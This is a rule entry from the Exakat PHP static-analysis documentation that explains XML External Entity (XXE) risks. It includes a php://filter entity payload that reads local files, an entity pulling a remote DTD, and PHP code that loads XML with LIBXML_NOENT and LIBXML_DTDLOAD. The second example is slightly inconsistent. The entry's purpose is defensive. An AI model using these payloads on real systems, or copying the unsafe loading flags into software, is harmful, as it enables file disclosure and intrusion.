1.2.816. No Net For Xml Load¶
Simplexml and ext/DOM load all external entities from the web, by default. This is dangerous, in particular when loading unknown XML code.
Look at this XML code below : it is valid. It defines an entity xxe
, that is filled with a file, read on the system and base64 encoded.:
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<replace>&xxe;</replace>
This file could be processed with the following code : note, you can replace ‘index.php’ in the above entity by any valid filepath.
Here, PHP tries to load the XML file, finds the entity, then solves the entity by encoding a file called index.php
. The source code of the file is not used as data in the XML file.
At that point, the example illustrates how a XXE works : by using the XML engine to load external resources, and preprocessing the XML code. in fact, there is only one change to make this XML code arbitrarily injected ::
<!DOCTYPE replace [<!ENTITY writer SYSTEM "https://www.example.com/entities.dtd"> ]>
<replace>&xxe;</replace>
With the above example, the XML code is static (as, it never changes), but the ‘xxe’ definitions are loaded from a remove website, and are completely under the attacker control.
<?php
$dom = new DOMDocument();
$dom->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD);
$info = simplexml_import_dom($dom);
print base64_decode($info[0]);
?>
See also XML External Entity,, XML External Entity (XXE) Processing and Detecting and exploiting XXE in SAML Interfaces.
1.2.816.1. Suggestions¶
Strip out any entity when using external XML
Forbid any network to the XML engine, by configuring the XML engine without network access
1.2.816.2. Specs¶
Short name |
Security/NoNetForXmlLoad |
Rulesets |
|
Exakat since |
1.0.11 |
PHP Version |
All |
Severity |
Major |
Time To Fix |
Slow (1 hour) |
Precision |
High |
Features |
xml |
Available in |